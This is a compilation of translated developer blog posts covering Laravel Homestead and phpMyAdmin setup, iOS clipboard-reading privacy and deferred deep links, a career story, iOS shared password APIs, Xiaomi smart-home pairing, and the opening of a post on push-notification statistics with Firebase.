This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Setting up a Laravel development environment from scratch and managing MySQL databases with phpMyAdmin GUI
Recently reset my Mac, recording the steps to restore the Laravel development environment.
After downloading and installing these two software, proceed to the next step of configuration.
During VirtualBox installation, you will be required to restart and go to “Settings” -> “Security & Privacy” -> “Allow VirtualBox” to enable all services.
1
+2
+3
+4
+
git clone https://github.com/laravel/homestead.git ~/Homestead
+cd ~/Homestead
+git checkout release
+bash init.sh
+
phpMyAdmin is a PHP-based web-based MySQL database management tool that allows administrators to manage MySQL databases through a web interface. This web interface provides a simpler way to input complex SQL syntax, especially for handling large data imports and exports. — Wiki
Download the latest version from the phpMyAdmin official website.
Unzip the .zip -> Folder -> Rename the folder to “phpMyAdmin”:
Move the phpMyAdmin folder to the ~/Homestead folder:
In the phpMyAdmin
folder, find config.sample.inc.php
, rename it to config.inc.php
, and open it with an editor to modify the settings as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+
<?php
+/* vim: set expandtab sw=4 ts=4 sts=4: */
+/**
+ * phpMyAdmin sample configuration, you can use it as base for
+ * manual configuration. For easier setup you can use setup/
+ *
+ * All directives are explained in documentation in the doc/ folder
+ * or at <https://docs.phpmyadmin.net/>.
+ *
+ * @package PhpMyAdmin
+ */
+declare(strict_types=1);
+
+/**
+ * This is needed for cookie based authentication to encrypt password in
+ * cookie. Needs to be 32 chars long.
+ */
+$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */
+
+/**
+ * Servers configuration
+ */
+$i = 0;
+
+/**
+ * First server
+ */
+$i++;
+/* Authentication type */
+$cfg['Servers'][$i]['auth_type'] = 'config';
+/* Server parameters */
+$cfg['Servers'][$i]['host'] = 'localhost';
+$cfg['Servers'][$i]['user'] = 'homestead';
+$cfg['Servers'][$i]['password'] = 'secret';
+$cfg['Servers'][$i]['compress'] = false;
+$cfg['Servers'][$i]['AllowNoPassword'] = false;
+
+/**
+ * phpMyAdmin configuration storage settings.
+ */
+
+/* User used to manipulate with storage */
+// $cfg['Servers'][$i]['controlhost'] = '';
+// $cfg['Servers'][$i]['controlport'] = '';
+// $cfg['Servers'][$i]['controluser'] = 'pma';
+// $cfg['Servers'][$i]['controlpass'] = 'pmapass';
+
+/* Storage database and tables */
+// $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';
+// $cfg['Servers'][$i]['bookmarktable'] = 'pma__bookmark';
+// $cfg['Servers'][$i]['relation'] = 'pma__relation';
+// $cfg['Servers'][$i]['table_info'] = 'pma__table_info';
+// $cfg['Servers'][$i]['table_coords'] = 'pma__table_coords';
+// $cfg['Servers'][$i]['pdf_pages'] = 'pma__pdf_pages';
+// $cfg['Servers'][$i]['column_info'] = 'pma__column_info';
+// $cfg['Servers'][$i]['history'] = 'pma__history';
+// $cfg['Servers'][$i]['table_uiprefs'] = 'pma__table_uiprefs';
+// $cfg['Servers'][$i]['tracking'] = 'pma__tracking';
+// $cfg['Servers'][$i]['userconfig'] = 'pma__userconfig';
+// $cfg['Servers'][$i]['recent'] = 'pma__recent';
+// $cfg['Servers'][$i]['favorite'] = 'pma__favorite';
+// $cfg['Servers'][$i]['users'] = 'pma__users';
+// $cfg['Servers'][$i]['usergroups'] = 'pma__usergroups';
+// $cfg['Servers'][$i]['navigationhiding'] = 'pma__navigationhiding';
+// $cfg['Servers'][$i]['savedsearches'] = 'pma__savedsearches';
+// $cfg['Servers'][$i]['central_columns'] = 'pma__central_columns';
+// $cfg['Servers'][$i]['designer_settings'] = 'pma__designer_settings';
+// $cfg['Servers'][$i]['export_templates'] = 'pma__export_templates';
+
+/**
+ * End of servers configuration
+ */
+
+/**
+ * Directories for saving/loading files from server
+ */
+$cfg['UploadDir'] = '';
+$cfg['SaveDir'] = '';
+
+/**
+ * Whether to display icons or text or both icons and text in table row
+ * action segment. Value can be either of 'icons', 'text' or 'both'.
+ * default = 'both'
+ */
+//$cfg['RowActionType'] = 'icons';
+
+/**
+ * Defines whether a user should be displayed a "show all (records)"
+ * button in browse mode or not.
+ * default = false
+ */
+//$cfg['ShowAll'] = true;
+
+/**
+ * Number of rows displayed when browsing a result set. If the result
+ * set contains more rows, "Previous" and "Next".
+ * Possible values: 25, 50, 100, 250, 500
+ * default = 25
+ */
+//$cfg['MaxRows'] = 50;
+
+/**
+ * Disallow editing of binary fields
+ * valid values are:
+ * false allow editing
+ * 'blob' allow editing except for BLOB fields
+ * 'noblob' disallow editing except for BLOB fields
+ * 'all' disallow editing
+ * default = 'blob'
+ */
+//$cfg['ProtectBinary'] = false;
+
+/**
+ * Default language to use, if not browser-defined or user-defined
+ * (you find all languages in the locale folder)
+ * uncomment the desired line:
+ * default = 'en'
+ */
+//$cfg['DefaultLang'] = 'en';
+//$cfg['DefaultLang'] = 'de';
+
+/**
+ * How many columns should be used for table display of a database?
+ * (a value larger than 1 results in some information being hidden)
+ * default = 1
+ */
+//$cfg['PropertiesNumColumns'] = 2;
+
+/**
+ * Set to true if you want DB-based query history.If false, this utilizes
+ * JS-routines to display query history (lost by window close)
+ *
+ * This requires configuration storage enabled, see above.
+ * default = false
+ */
+//$cfg['QueryHistoryDB'] = true;
+
+/**
+ * When using DB-based query history, how many entries should be kept?
+ * default = 25
+ */
+//$cfg['QueryHistoryMax'] = 100;
+
+/**
+ * Whether or not to query the user before sending the error report to
+ * the phpMyAdmin team when a JavaScript error occurs
+ *
+ * Available options
+ * ('ask' | 'always' | 'never')
+ * default = 'ask'
+ */
+//$cfg['SendErrorReports'] = 'always';
+
+/**
+ * You can find more configuration options in the documentation
+ * in the doc/ folder or at <https://docs.phpmyadmin.net/>.
+ */
+
Mainly add and modify these three settings:
1
+2
+
$cfg['Servers'][$i]['auth_type'] = 'config';
+$cfg['Servers'][$i]['user'] = 'homestead';
+
The default MySQL username and password for homestead are
homestead
/secret
.
Open the ~/Homestead/Homestead.yaml
configuration file with an editor.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+
---
+ip: "192.168.10.10"
+memory: 2048
+cpus: 2
+provider: virtualbox
+
+authorize: ~/.ssh/id_rsa.pub
+
+keys:
+ - ~/.ssh/id_rsa
+
+folders:
+ - map: ~/Projects/Web
+ to: /home/vagrant/code
+ - map: ~/Homestead/phpMyAdmin
+ to: /home/vagrant/phpMyAdmin
+
+sites:
+ - map: phpMyAdmin.test
+ to: /home/vagrant/phpMyAdmin
+
+databases:
+ - homestead
+
+features:
+ - mysql: false
+ - mariadb: false
+ - postgresql: false
+ - ohmyzsh: false
+ - webdriver: false
+
+#services:
+# - enabled:
+# - "postgresql@12-main"
+# - disabled:
+# - "postgresql@11-main"
+
+# ports:
+# - send: 50000
+# to: 5000
+# - send: 7777
+# to: 777
+# protocol: udp
+
IP
: The default is 192.168.10.10
, can be changed or notprovider
: The default is virtualbox
, only needs to be changed if using Parallelsfolders:
Add - map: ~/Homestead/phpMyAdmin to: /home/vagrant/phpMyAdminsites:
Add - map: phpMyAdmin.test to: /home/vagrant/phpMyAdminIf you already have a Laravel project, you can also add it here. For example, I put my projects under ~/Projects/Web
, so I also add the directory mapping.
Use Finder -> Go -> /etc/hosts
, find the hosts
file; copy it to the desktop (because it cannot be modified directly)
The domain name can be customized as you like, as only your local machine can access it.
Open the copied Hosts file and add the sites record:
1
+
<homestead IP address> <domain name>
+
After modifying, save it, then cut and paste it back to /etc/hosts
, overwriting the original file.
1
+2
+
cd ~/Homestead
+vagrant up --provision
+
⚠️ Please note that if you do not add
--provision
, the configuration file will not be updated, and you will get ano input file specified
error when entering the URL.
The first time you start it, you need to download the Homestead environment package, which takes a long time.
If no special errors occur, it means the startup was successful. You can then run:
1
+
vagrant ssh
+
ssh into the virtual machine.
Go to http://phpmyadmin.test/ to check if it opens normally.
Success! We encountered a place where we need to operate the database, just come here and modify it directly.
If you have an existing project, you can already run it locally from the browser at this step. If not, here is how to create a new Laravel project.
1
+2
+
~/Homestead
+vagrant ssh
+
SSH into the VM, then cd to the code directory:
1
+
cd ./code
+
Run laravel new
followed by the project name to create a Laravel project (using blog as an example):
1
+
laravel new blog
+
The blog project has been successfully created!
Go back and open the ~/Homestead/Homestead.yaml
configuration file.
Add a record in sites
:
1
+2
+3
+
sites:
+ - map: myblog.test
+ to: /home/vagrant/code/blog/public
+
Remember to add a corresponding record in hosts:
1
+
192.168.10.10. myblog.test
+
Finally, restart homestead:
1
+
vagrant reload --provision
+
Enter http://myblog.test in the browser to test if it is correctly set up and running:
Done!
Although using Homestead means you don’t need to install Composer separately, considering that some PHP projects may not use Laravel, you still need to install Composer locally.
Copy the command from the download section and replace php composer-setup.php
with:
1
+
php composer-setup.php - install-dir=/usr/local/bin - filename=composer
+
Composer v2.0.9 example:
1
+2
+3
+4
+
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
+php -r "if (hash_file('sha384', 'composer-setup.php') === '756890a4488ce9024fc62c56153228907f1545c228516cbf63f885e036d37e9a59d27d63f46af1d4d07ee0f76181c7d3') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"
+php composer-setup.php --install-dir=/usr/local/bin --filename=composer
+php -r "unlink('composer-setup.php');"
+
Enter the commands sequentially in the terminal.
⚠️Please note not to directly copy and use the above example, as the hash check code will change with Composer version updates.
Enter composer -V
to confirm the version and successful installation!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Why do so many iOS apps read your clipboard?
Photo by Clint Patterson
Starting from iOS ≥ 16, if the user does not actively perform a paste action, a prompt will appear when an app attempts to read the clipboard. The user must click allow for the app to access the clipboard information.
UIPasteBoard’s privacy change in iOS 16
Top prompt message when the clipboard is read by an app
Starting from iOS 14, users are notified when an app reads their clipboard. This has caused significant privacy concerns, especially with apps from China, which already have a notorious reputation. The media has amplified these concerns, leading to widespread panic. However, it’s not just Chinese apps; many apps from the US, Taiwan, Japan, and around the world have been found to read the clipboard. So why do so many apps need to read the clipboard?
Google Search
The clipboard may contain personal information or even passwords, such as those copied from password managers like 1Password or LastPass. Apps that can read the clipboard can potentially send this information back to their servers, depending on the developer’s integrity. To investigate, one can use man-in-the-middle sniffing to monitor the data being sent back to the app’s servers to see if it includes clipboard information.
The Clipboard API has been available since iOS 3 in 2009. It wasn’t until iOS 14 that a prompt was added to notify users. Over the past decade, malicious apps could have already collected enough data.
Why do so many apps, both domestic and international, read the clipboard when opened?
First, let’s define the situation: I’m referring to “when the app is opened”, not when the app is actively being used. Reading the clipboard during app usage is more related to app functionality, such as Google Maps automatically pasting a copied address. However, some apps may continuously steal clipboard information.
“A kitchen knife can be used to cut vegetables or to kill, depending on what the person using it intends to do.”
The main reason the APP reads the clipboard when opened is to enhance the user experience through “ iOS Deferred Deep Link “, as shown in the process above. When a product offers both a web version and an APP, we prefer users to install the APP (as it has higher engagement). Therefore, when users browse the web version, they are guided to download the APP. We hope that after downloading and opening the APP, it will automatically open the page where the user left off on the web.
EX: When I browse the PxHome mobile web version on Safari -> see a product I like and want to buy -> PxHome wants to direct traffic to the APP -> download the APP -> open the APP -> display the product I saw on the web.
If we don’t do this, users can only 1. Go back to the web and click again, or 2. Search for the product again in the APP. Both options increase the difficulty and hesitation time for users to make a purchase, which might result in them not buying at all!
From an operational perspective, knowing the source of successful installations is very helpful for marketing and advertising budget allocation.
This is a cat-and-mouse game because Apple does not want developers to have a way to track user sources. Before iOS 9, the method was to store information in web cookies and read them after the APP was installed. After iOS 10, Apple blocked this method. With no other options, everyone resorted to the final technique — “using the clipboard to transmit information.” iOS 14 introduced a new feature that alerts users, making developers awkward.
Another method is using Branch.io to record user profiles (IP, phone information) and then match the information. This is theoretically feasible but requires a lot of manpower (involving backend, database, APP) to research and implement, and it may result in misjudgments or collisions.
*Android Google supports this feature natively, without the need for such workarounds.
Many APP developers may not know they also have clipboard privacy issues because Google’s Firebase Dynamic Links service uses the same principle:
1
+2
+3
+4
+5
+
// Reason for this string to ensure that only FDL links, copied to clipboard by AppPreview Page
+// JavaScript code, are recognized and used in copy-unique-match process. If user copied FDL to
+// clipboard by himself, that link must not be used in copy-unique-match process.
+// This constant must be kept in sync with constant in the server version at
+// durabledeeplink/click/ios/click_page.js
+
Therefore, any APP using Google’s Firebase Dynamic Links service may have clipboard privacy issues!
There are security issues, but it boils down to trust. Trust that developers are doing the right thing. If developers want to do evil, there are more effective ways, such as stealing credit card information or recording real passwords.
The purpose of the alert is to let users notice when the clipboard is being read. If it’s unreasonable, be cautious!
Q: “TikTok responded that accessing the clipboard is to detect spam behavior.” Is this statement correct?
A: I personally think it’s just an excuse to appease public opinion. TikTok means “to prevent users from copying and pasting ad messages everywhere.” But this can be done when the message is completed or sent, without constantly monitoring the user’s clipboard information. Do they also need to manage if the clipboard has ads or “sensitive” information? I haven’t pasted and published it yet.
If you don’t have a spare device to upgrade to iOS 14 for testing, you can download XCode 12 from Apple and test it using the simulator.
Everything is still very new. If you are using Firebase, you can refer to Firebase-iOS-SDK/Issue #5893 and update to the latest SDK.
If you are implementing DeepLink yourself, you can refer to the modifications in Firebase-iOS-SDK #PR 5905:
Swift:
1
+2
+3
+4
+5
+6
+7
+
if #available(iOS 10.0, *) {
+ if (UIPasteboard.general.hasURLs) {
+ //UIPasteboard.general.string
+ }
+} else {
+ //UIPasteboard.general.string
+}
+
Objective-C:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
if (@available(iOS 10.0, *)) {
+ if ([[UIPasteboard generalPasteboard] hasURLs]) {
+ //[UIPasteboard generalPasteboard].string;
+ }
+ } else {
+ //[UIPasteboard generalPasteboard].string;
+ }
+ return pasteboardContents;
+}
+
First, check if the clipboard content is a URL (in line with the content copied by web JavaScript being a URL with parameters). If it is, then read it, so the clipboard won’t be read every time the app is opened.
Currently, this is the only way. The prompt will still appear, but it will be more focused.
Additionally, Apple has introduced a new API: DetectPattern to help developers more accurately determine if the clipboard information is what we need, then read it and prompt, making users feel more secure while developers can continue to use this feature.
DetectPattern is still in Beta and can only be implemented using Objective-C.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
The life opportunity from stepping into the information field to switching to iOS APP development
Bangkok 2018 - Z Realm — You are not alone on the road to solving problems
Time flies, it’s been a year since I switched from Back End to developing Mobile iOS APPs, and a month since I started writing on Medium. For this 10th small milestone, let me write about my experience of breaking through and switching tracks.
“The instinct to explore drives great human achievements.” From Columbus exploring the oceans and discovering new continents, the Wright brothers improving airplanes to conquer the skies, to now leaving Earth to explore outer space; only by being passionate about new things can we continuously surpass ourselves. Perhaps we cannot be as great as Armstrong, but as he said, “One small step for a man, one giant leap for mankind.” Do not underestimate your creativity and talents.
When opportunities come, grasp them well because there is no guarantee of a second chance. You might hesitate, thinking the next one might be better or fearing you made the wrong decision, but “Who knows? Will the sun rise first or will an accident happen first” If there are no negative impacts, then open your arms and seize the opportunity!
Going back to 2009, when I just entered the first year of high school at Chang Kung Comprehensive High School, I learned by chance that the school was training students to participate in competitions. My initial thought was, “Since there’s nothing to do at home, why not learn something?” So I signed up and joined; this was the first turning point in my life, stepping into the information field. Joining the training was tough, practicing every day after school, on weekends, and during winter and summer vacations for three years. The risk was high; if you didn’t place in the competition, you almost got nothing. But looking back, I’m glad I seized this opportunity (I’ll share more about the journey of being a contestant later).
National Skills Competition - Ministry of Labor Workforce Development Agency
This opportunity taught me many skills for making a living, such as design tools like Illustrator/Photoshop/Flash, and engineering tools like PHP/MySQL/HTML/CSS/JavaScript/jQuery. I also got admitted to National Taiwan University of Science and Technology through the competition champion qualification. Looking back, I’m really glad I seized this opportunity!
Fast forward to 2017, after graduating from university, I entered the workforce as a back-end engineer. In terms of web development, I mainly specialized in back-end (Laravel) during university, and didn’t research much on the front-end, using ready-made frameworks (Bootstrap/Semantic UI).
At this point, I hit a bottleneck, being in the same field for too long without any breakthrough development. So I set new goals for myself:
At this time, another opportunity appeared. The project I joined was about to start developing a mobile platform application. Initially, my plan was to write the API back-end, using Laravel with some new technologies, which would also be a kind of breakthrough for me. Here, I must mention that when making decisions, you should look far ahead. My initial choice to continue with the back-end was due to inertia and the high perceived cost of stepping into a new field, as I didn’t have a Mac and it was a completely new area. Fortunately, with my supervisor’s guidance, I eventually chose to step into iOS APP development.
Now, in 2018, it’s been exactly a year since I started developing iOS APPs. The gains include learning a new language, Swift, iOS APP development, the sense of achievement from launching my own APP, and starting to write on Medium. I’m glad I seized this opportunity, as it opened another window for my career!
“Isn’t programming all the same?” Switching fields is like switching mountains…
Having someone guide you initially can speed things up because many concepts are quite different from web development. You’ll go through a period of hitting walls, but hang in there! You’ll see the light of success!
I myself hit walls for almost a month. After getting a bit of a grasp, you’ll encounter the second wall period. At this point, you need to become more resilient, learn from mistakes, and trade time for experience (if you don’t have enough time, consider taking an introductory course or finding a mentor).
<table>
and ran a PHP loop to display data. But in an app, you need to use the UITableView component to implement it (I remember using UIView to layout and happily telling my supervisor I was done, only to find out it caused a huge memory explosion). Other aspects like memory leaks also need more attention!Five stars warm the heart, one star breaks it
Life is interesting because of its uncertainties. For the opportunities that come, if you choose to seize them, you’ll gain something; if you choose to let go, the next opportunity might be better. There’s no right or wrong. Just trust your intuition: “Choose what you love, love what you choose.”
Currently still a novice, I will continue to delve into iOS app development, learning and growing towards the future, seeking breakthroughs, and maintaining the habit of writing on Medium. What will the next opportunity be? I’m looking forward to it!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
A feature more worthwhile than Sign in with Apple
Photo by Dan Nelson
One of the most common problems in services that have both a website and an app is that users register and log in on the website, with passwords remembered; but when guided to install the app, they find it very inconvenient to re-enter their account and password from scratch. This feature allows the existing account and password on the phone to be automatically filled into the app associated with the website, speeding up the user login process.
Without further ado, here is the completed effect diagram; at first glance, you might think it’s the iOS ≥ 11 Password AutoFill feature; but please look carefully, the keyboard did not pop up, and I clicked the “Choose Saved Password” button to bring up the account and password selection window.
Since Password AutoFill is mentioned, let me first introduce Password AutoFill and how to set it up!
Support: iOS ≥ 11
By now, iOS 14, this feature is very common and nothing special; on the account and password login page in the app, when the keyboard is called up for input, you can quickly select the account and password of the web version service, and after selection, it will be automatically filled in for quick login!
Associated Domains! We specify Associated Domains in the app and upload the apple-app-site-association file on the website, and they can recognize each other.
1. In the project settings “Signing & Capabilities” -> Top left “+ Capabilities” -> “Associated Domains”
Add webcredentials:your website domain
(ex: webcredentials:google.com
).
2. Go to Apple Developer Console
In the “ Membership “ tab, record the “ Team ID “
3. Go to “Certificates, Identifiers & Profiles” -> “Identifiers” -> Find your project -> Enable the “Associated Domains” feature
App-side settings completed!
4. Web Site Configuration
Create a file named “apple-app-site-association” (without an extension), edit it with a text editor, and enter the following content:
1
+2
+3
+4
+5
+6
+7
+
{
+ "webcredentials": {
+ "apps": [
+ "TeamID.BundleId"
+ ]
+ }
+}
+
Replace TeamID.BundleId
with your project settings (e.g., TeamID = ABCD
, BundleID = li.zhgchg.demoapp
=> ABCD.li.zhgchg.demoapp
).
Upload this file to the website’s root directory
or /.well-known
directory. Assuming your webcredentials website domain
is set to google.com
, this file should be accessible at google.com/apple-app-site-association
or google.com/.well-known/apple-app-site-association
.
Note: Subdomains
According to the official documentation, if there are subdomains, they must all be listed in the Associated Domains.
Web Configuration Complete!
Note: applinks
It has been observed that if a universal link applinks
has been set, the webcredentials
part is not necessary for it to be effective. However, we will follow the documentation to avoid potential issues in the future.
For the code part, we only need to set the TextField as follows:
1
+2
+
usernameTextField.textContentType = .username
+passwordTextField.textContentType = .password
+
If it is a new registration, the password confirmation field can use:
1
+
repeatPasswordTextField.textContentType = .newPassword
+
After rebuilding and running the app, the option to use saved passwords from the same website will appear above the keyboard when entering the account.
It might be because the autofill password feature is not enabled (it is disabled by default in the simulator). Go to “Settings” -> “Passwords” -> “Autofill Passwords” -> Enable “Autofill Passwords”.
Alternatively, the website might not have any existing passwords. You can add one in “Settings” -> “Passwords” -> Top right corner “+” -> Add.
After introducing Password AutoFill, let’s move on to the main topic: how to achieve the effect shown in the illustration.
Introduced in iOS 8.0, although rarely seen in apps before Password AutoFill was released, this API can integrate website account passwords for quick user selection.
Shared Web Credentials can not only read account passwords but also add, modify, and delete stored account passwords.
⚠️ The configuration part must also set up Associated Domains, as mentioned in the Password AutoFill setup.
So it can be said to be an enhanced version of the Password AutoFill feature!!
Because the environment required for Password AutoFill must be set up first to use this “advanced” feature.
Reading is done using the SecRequestSharedWebCredential
method:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+
SecRequestSharedWebCredential(nil, nil) { (credentials, error) in
+ guard error == nil else {
+ DispatchQueue.main.async {
+ //alert error
+ }
+ return
+ }
+
+ guard CFArrayGetCount(credentials) > 0,
+ let dict = unsafeBitCast(CFArrayGetValueAtIndex(credentials, 0), to: CFDictionary.self) as? Dictionary<String, String>,
+ let account = dict[kSecAttrAccount as String],
+ let password = dict[kSecSharedPassword as String] else {
+ DispatchQueue.main.async {
+ //alert error
+ }
+ return
+ }
+
+ DispatchQueue.main.async {
+ //fill account,password to textfield
+ }
+}
+
SecRequestSharedWebCredential(fqdn, account, completionHandler)
webcredentials
domains, you can specify one, or use null to not specifyEffect image. (You may notice it is different from the initial effect image)
⚠️ This method has been marked as Deprecated in iOS 14!
⚠️ This method has been marked as Deprecated in iOS 14!
⚠️ This method has been marked as Deprecated in iOS 14!
"Use ASAuthorizationController to make an ASAuthorizationPasswordRequest (AuthenticationServices framework)"
This method is only applicable for iOS 8 ~ iOS 14. After iOS 13, you can use the same API as Sign in with Apple — AuthenticationServices
Support iOS ≥ 13
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
import AuthenticationServices
+
+class ViewController: UIViewController {
+ override func viewDidLoad() {
+ super.viewDidLoad()
+ //...
+ let request: ASAuthorizationPasswordRequest = ASAuthorizationPasswordProvider().createRequest()
+ let controller = ASAuthorizationController(authorizationRequests: [request])
+ controller.delegate = self
+ controller.performRequests()
+ //...
+ }
+}
+
+extension ViewController: ASAuthorizationControllerDelegate {
+ func authorizationController(controller: ASAuthorizationController, didCompleteWithAuthorization authorization: ASAuthorization) {
+
+ if let credential = authorization.credential as? ASPasswordCredential {
+ // fill credential.user, credential.password to textfield
+ }
+ // else if as? ASAuthorizationAppleIDCredential... sign in with apple
+ }
+ func authorizationController(controller: ASAuthorizationController, didCompleteWithError error: Error) {
+ // alert error
+ }
+}
+
Effect image, you can see that the new method integrates better with Sign in with Apple in terms of process and display.
⚠️ This login cannot replace Sign in with Apple (they are different things).
Only the reading part is deprecated, the parts for adding, deleting, and editing can still be used as usual.
The parts for adding, deleting, and editing use SecAddSharedWebCredential
for operations.
1
+2
+3
+4
+5
+6
+7
+8
+9
+
SecAddSharedWebCredential(domain as CFString, account as CFString, password as CFString?) { (error) in
+ DispatchQueue.main.async {
+ guard error == nil else {
+ // alert error
+ return
+ }
+ // alert success
+ }
+}
+
SecAddSharedWebCredential(fqdn, account, password, completionHandler)
webcredentials
nil
⚠️ Additionally, you cannot modify in the background secretly; a prompt will appear each time you modify, asking the user to confirm by clicking “Update Password” to actually change the data.
The last small feature, the password generator.
Use SecCreateSharedWebCredentialPassword()
to operate.
1
+
let password = SecCreateSharedWebCredentialPassword() as String? ?? ""
+
The generated password consists of uppercase and lowercase English letters and numbers, using “-“ as a separator (e.g., Jpn-4t2-gaF-dYk).
If you use third-party password management tools (e.g., onepass, lastpass), you might notice that while Password AutoFill on the keyboard supports display & input, it does not show up in AuthenticationServices or SecRequestSharedWebCredential. It’s unclear if this can be achieved.
Thank you for reading, and thanks to saiday and StreetVoice for letting me know about this feature XD.
Also, XCode ≥ 12.5 simulators have added recording and GIF saving features, which are super useful!
Press “Command” + “R” on the simulator to start recording, click the red dot to stop recording; right-click on the preview image that slides out from the bottom right -> “Save as Animated GIF” to save it as a GIF and directly paste it into the article!
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Newly purchased Xiaomi Air Purifier 3 & recording the linkage issues between Mi Home and Xiao Ai Speaker
This is the fourth article about Xiaomi; recently added a new member — “Xiaomi Air Purifier 3” Honestly, I never cared about the air quality in my room. Seeing the foggy outdoor air always made me a bit worried, and since I have long-term nasal allergies, I decided to buy one for my room!
The new generation has a small screen on the main unit that shows the remaining filter usage time, current air quality, and operation mode selection. It can be used without connecting to the APP; if connected to the APP, it can be controlled remotely, but there are no other special functions.
After two weeks of use, I found that the air quality in the room is quite good; when the outdoor air is good, the indoor air quality value is around 001~006; when the outdoor air is bad, the indoor value is about 008~015; values over 75 are considered poor air quality, and over 150 is considered severe; I should have bought a vacuum cleaner instead XD But having a small air guardian at home is also quite nice.
The Mi Home APP has two regions to choose from: Taiwan and China; the region selection affects the functions within the APP. When setting it up initially, I chose the China region, thinking that data is not safe in any region, so I might as well choose the one with more functions to play with.
After adding the Xiao Ai Speaker last year, I noticed a more complex issue with region selection; if you want to control Mi Home smart appliances from the Xiao Ai Speaker, both APPs must be set to the same region, otherwise, they cannot be linked. This is quite troublesome because if the Xiao Ai Speaker is set to Taiwan, it can pair with KKBOX but the smart functions are a stripped-down version (missing Xiao Ai training).
Therefore, my Xiao Ai Speaker was originally set to the China region. I didn’t encounter any problems when adding previously purchased appliances, and finally, I was able to establish a complete smart home process: saying goodbye to Xiao Ai when leaving would automatically turn off all appliances and turn on the door camera; saying I’m home would automatically turn on the appliances. The experience was quite smooth!
Left: Taiwan/Right: China
Having bought so many Xiaomi home products, the new member must also join my Mi Home APP! However, I encountered a problem when adding it; the Taiwan version of the Xiaomi Air Purifier 3 could not be added to my Mi Home APP. I had to switch the Mi Home APP region back to Taiwan to add it…
This was troublesome, as only the air purifier could not be added; no matter how I tried, it seemed that the pairing methods for Taiwan and China were different. Reluctantly, I had to switch the region back to Taiwan and reset all appliances… The Xiao Ai Speaker was also switched back to Taiwan.
Due to switching the region back to Taiwan, the “Xiao Ai Training” function was lost; it was impossible to set up vocabulary to execute corresponding Mi Home smart home scenes directly in the APP. After multiple attempts, I found that if the smart home is linked and authorized to the Mi Home APP, the scenes and appliances will still automatically link to the Xiao Ai Speaker for authorized control!
My scene “I’m home” could be correctly recognized and executed by the Xiao Ai Speaker, but “I’m leaving” could not be recognized. After trying for an entire afternoon, I found it was a traditional and simplified Chinese issue; when I changed the scene name to “出门” (simplified), the Xiao Ai Speaker could recognize and execute it correctly.
So, friends who have issues with scene execution might want to change the scene name and device name to simplified Chinese.
Done! This way, you can continue to use the Mi Home smart home with the APP region set to Taiwan, maintaining the original experience.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
When push notification statistics meet Firebase Firestore + Functions
Photo by Carlos Muza
Recently, I wanted to introduce a feature to the APP. Before implementation, we could only use the success or failure of posting data to APNS/FCM from the backend as the base for push notifications and record the click-through rate. However, this method is very inaccurate as the base includes many invalid devices. Devices with the APP deleted (which may not immediately become invalid) or with push notifications disabled will still return success when posting from the backend.
After iOS 10, you can implement the Notification Service Extension to secretly call an API for statistics when the push notification banner appears. The advantage is that it is very accurate; it only calls when the user’s push notification banner appears. If the APP is deleted, notifications are turned off, or the banner is not displayed, there will be no action. The banner appearing equals a push notification message, and using this as the base for push notifications and then counting the clicks will give an “accurate click-through rate.”
For detailed principles and implementation methods, refer to the previous article: “iOS ≥ 10 Notification Service Extension Application (Swift)”
Currently, the APP’s loss rate should be 0% based on tests. A common practical application is Line’s point-to-point message encryption and decryption (the push notification message is encrypted and decrypted only when received on the phone).
The work on the APP side is actually not much. Both iOS/Android only need to implement similar functions (but if considering the Chinese market for Android, it becomes more complicated as you need to implement push notification frameworks for more platforms). The bigger work is on the backend and server pressure handling because when a push notification is sent out, it will simultaneously call the API to return records, which might overwhelm the server’s max connection. If using RDBMS to store records, it could be even more severe. If you find statistical losses, it often happens at this stage.
You can record by writing logs to files and do statistics and display when querying.
Additionally, thinking about the scenario of simultaneous returns, the quantity might not be as large as imagined. Push notifications are not sent out in tens or hundreds of thousands at once but in batches. As long as you can handle the number of simultaneous returns from batch sending, it should be fine!
Considering the issues mentioned, the backend needs effort to research and modify, and the market may not care about the results. So, I thought of using available resources to create a prototype to test the waters.
Here, I chose Firebase services, which almost all APPs use, specifically the Functions and Firestore features.
